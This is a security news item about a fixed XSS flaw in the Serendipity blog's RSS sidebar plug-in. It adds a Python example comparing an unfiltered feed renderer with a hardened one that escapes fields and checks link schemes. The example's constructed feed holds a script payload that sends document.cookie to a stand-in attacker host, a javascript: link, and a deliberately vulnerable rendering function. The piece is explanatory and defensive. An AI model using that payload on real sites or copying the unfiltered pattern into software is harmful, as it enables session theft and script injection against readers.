XSS vulnerability in Serendipity blog system remedied
An attacker who controls an external RSS feed that a Serendipity blog displays through the remote RSS sidebar plug-in can inject arbitrary HTML and script code into the blog's pages; the code then runs in readers' browsers in the context of the blog system and may even expose login data. The cause is that the plug-in inserts the content of external feeds into the page without filtering it.
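To make the bug class concrete, here is an added example in Python (not Serendipity's own PHP plug-in code, and not taken from the advisory): a sidebar renderer that concatenates feed fields into the page unchanged, next to a hardened version that escapes every field and rejects non-http(s) links. The feed content is constructed for the example, and the function names and the `attacker.invalid` host are assumptions.

```python
"""Added example: rendering an untrusted RSS feed with and without output filtering."""
import html
import xml.etree.ElementTree as ET

# Constructed feed. The remote server is attacker-controlled, so every field is
# untrusted. RSS descriptions routinely carry HTML-escaped markup that readers
# render as HTML, so a consumer that inserts the decoded text verbatim runs the script.
MALICIOUS_FEED = """<?xml version="1.0"?>
<rss version="2.0">
  <channel>
    <title>Example feed</title>
    <item>
      <title>Harmless &lt;b&gt;title&lt;/b&gt;</title>
      <link>javascript:alert(document.cookie)</link>
      <description>&lt;script&gt;new Image().src='http://attacker.invalid/?c='+document.cookie&lt;/script&gt;</description>
    </item>
  </channel>
</rss>"""


def parse_items(feed_xml):
    """Return the title, link and description of each <item>, entities already decoded."""
    root = ET.fromstring(feed_xml)
    items = []
    for item in root.iter("item"):
        items.append({
            "title": item.findtext("title", ""),
            "link": item.findtext("link", ""),
            "description": item.findtext("description", ""),
        })
    return items


def render_sidebar_unfiltered(feed_xml):
    """Vulnerable pattern: feed fields go into the page as-is, so feed HTML becomes page HTML."""
    out = ['<ul class="rss">']
    for it in parse_items(feed_xml):
        out.append(f'<li><a href="{it["link"]}">{it["title"]}</a><br>{it["description"]}</li>')
    out.append("</ul>")
    return "\n".join(out)


SAFE_SCHEMES = ("http://", "https://")


def safe_link(url):
    """Allow only http(s) URLs (blocks javascript: and data: links) and escape for an attribute."""
    url = url.strip()
    if url.lower().startswith(SAFE_SCHEMES):
        return html.escape(url, quote=True)
    return "#"


def render_sidebar_filtered(feed_xml):
    """Hardened pattern: every feed field is HTML-escaped before it reaches the page."""
    out = ['<ul class="rss">']
    for it in parse_items(feed_xml):
        title = html.escape(it["title"], quote=True)
        desc = html.escape(it["description"], quote=True)
        out.append(f'<li><a href="{safe_link(it["link"])}">{title}</a><br>{desc}</li>')
    out.append("</ul>")
    return "\n".join(out)


if __name__ == "__main__":
    print("--- unfiltered (vulnerable) ---")
    print(render_sidebar_unfiltered(MALICIOUS_FEED))
    print("--- filtered ---")
    print(render_sidebar_filtered(MALICIOUS_FEED))
```

Escaping everything drops legitimate formatting that feed descriptions often contain; a plug-in that wants to keep bold text or links needs an allowlist-based HTML sanitizer instead of `html.escape`. What it must never do is the first pattern, because the feed owner, not the blog owner, then decides which script runs in the blog's origin.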
The flaw is fixed in Serendipity 1.2.1. The new version also brings a number of improvements and fixes for minor flaws; for instance, a new WordPress database importer is said to ease the switch from WordPress to Serendipity.
- Serendipity 1.2.1 released, Serendipity announcement
- Cross site scripting (XSS) in rss feed plugin of Serendipity 1.2, security advisory by Hanno Böck